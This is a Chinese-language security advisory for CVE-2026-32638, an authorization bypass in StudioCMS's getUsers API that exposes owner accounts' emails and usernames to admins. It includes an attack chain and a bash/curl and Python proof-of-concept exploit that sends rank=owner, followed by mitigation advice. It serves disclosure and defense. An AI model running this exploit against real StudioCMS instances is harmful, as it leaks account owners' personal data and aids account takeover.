CVE-2026-32638 StudioCMS getUsers接口权限绕过漏洞

漏洞信息

漏洞编号

CVE-2026-32638

漏洞类型

访问控制绕过

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

StudioCMS

漏洞概述

StudioCMS是一个基于Astro原生构建的服务端渲染无头内容管理系统。该漏洞存在于StudioCMS的REST API getUsers接口中，存在授权验证不一致的安全问题。攻击者（拥有管理员权限）可以通过在请求中构造特定的rank查询参数（rank=owner）来绕过正常的访问控制过滤机制，获取原本仅限所有者（owner）账户可见的用户信息，包括用户ID、用户名、显示名称和电子邮件地址等敏感数据。值得注意的是，同一用户管理模块下的getUser接口正确实现了权限检查，能够阻止管理员查看所有者用户信息，但getUsers接口存在相同的授权检查缺陷，形成了同一用户管理界面的授权不一致问题。漏洞影响版本为0.4.4之前的版本，攻击复杂度低，无需用户交互即可利用。

技术细节

该漏洞属于水平/垂直权限绕过问题，具体表现为同一用户管理模块中不同API端点的授权验证逻辑不一致。在StudioCMS的REST API设计中，getUsers接口使用攻击者可控的rank查询参数来决定是否从结果集中过滤所有者账户。管理员持有有效的admin token后，向getUsers接口发送带有rank=owner参数的请求时，系统未正确验证权限就直接返回了所有者的账户记录，包括用户ID、用户名、显示名称和邮箱地址等敏感信息。而getUser接口针对单个用户的查询则正确实现了权限控制，能够阻止管理员访问所有者用户数据。这种同一功能模块中授权验证的不一致性使得原本应该被限制访问的高权限账户信息发生泄露，攻击者可以利用获取到的所有者账户信息进行进一步的攻击活动。漏洞的根本原因在于getUsers接口对rank参数的处理缺少服务端权限校验逻辑，错误地信任了客户端传入的过滤条件。

攻击链分析

STEP 1

1

攻击者获取StudioCMS的管理员访问令牌（可通过社会工程、凭证泄露或其他途径获得）

STEP 2

2

攻击者向目标服务器的getUsers API端点发送正常请求，观察返回的非所有者用户列表

STEP 3

3

攻击者在请求中添加rank=owner查询参数，绕过服务端对owner账户的过滤机制

STEP 4

4

系统错误地返回所有owner账户的敏感信息，包括用户ID、用户名、显示名称和邮箱地址

STEP 5

5

攻击者利用获取的所有者账户信息进行进一步攻击，如账户接管或权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2026-32638 PoC - StudioCMS getUsers Authorization Bypass
# This script demonstrates how an admin token can bypass authorization to access owner accounts

TARGET_URL="http://target-server/api"
ADMIN_TOKEN="your_admin_token_here"

echo "[*] Testing CVE-2026-32638: StudioCMS getUsers Authorization Bypass"
echo "[*] Target: $TARGET_URL"

# Step 1: Normal admin request (should not see owner accounts)
echo "\n[+] Step 1: Normal getUsers request (admin token)"
curl -s -X GET "$TARGET_URL/getUsers" \
  -H "Authorization: Bearer $ADMIN_TOKEN" \
  -H "Content-Type: application/json" | jq .

# Step 2: Bypass request with rank=owner parameter
echo "\n[+] Step 2: Bypass request with rank=owner parameter"
curl -s -X GET "$TARGET_URL/getUsers?rank=owner" \
  -H "Authorization: Bearer $ADMIN_TOKEN" \
  -H "Content-Type: application/json" | jq .

# Step 3: Extract owner account information
echo "\n[+] Extracted owner account information:"
curl -s -X GET "$TARGET_URL/getUsers?rank=owner" \
  -H "Authorization: Bearer $ADMIN_TOKEN" \
  -H "Content-Type: application/json" | jq '.[] | {id, username, displayName, email}'

echo "\n[!] If owner accounts are returned, the vulnerability is confirmed."

echo "\n# Python PoC\nimport requests\n\ndef exploit_cve_2026_32638(target_url, admin_token):\n    \"\"\"\n    Exploit for CVE-2026-32638\n    StudioCMS getUsers endpoint authorization bypass\n    \"\"\"\n    headers = {\n        'Authorization': f'Bearer {admin_token}',\n        'Content-Type': 'application/json'\n    }\n    \n    # Normal request - should filter owner accounts\n    normal_response = requests.get(f'{target_url}/getUsers', headers=headers)\n    print(f'[-] Normal request status: {normal_response.status_code}')\n    \n    # Bypass request - using rank=owner parameter\n    bypass_params = {'rank': 'owner'}\n    bypass_response = requests.get(\n        f'{target_url}/getUsers',\n        params=bypass_params,\n        headers=headers\n    )\n    print(f'[+] Bypass request status: {bypass_response.status_code}')\n    \n    if bypass_response.status_code == 200:\n        owners = bypass_response.json()\n        print(f'[+] Found {len(owners)} owner account(s):')\n        for owner in owners:\n            print(f'    - ID: {owner.get("id")}')\n            print(f'      Username: {owner.get("username")}')\n            print(f'      Email: {owner.get("email")}')\n            print(f'      Display Name: {owner.get("displayName")}')\n    \n    return bypass_response.json()\n"

影响范围

StudioCMS < 0.4.4

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）在API网关层添加请求过滤规则，阻止带有rank=owner参数的getUsers请求；2）限制管理员token的获取渠道，增强凭证管理安全；3）启用API访问日志实时监控，及时发现异常查询行为；4）对返回的敏感信息进行字段级脱敏处理；5）联系StudioCMS官方获取安全补丁或确认的缓解方案。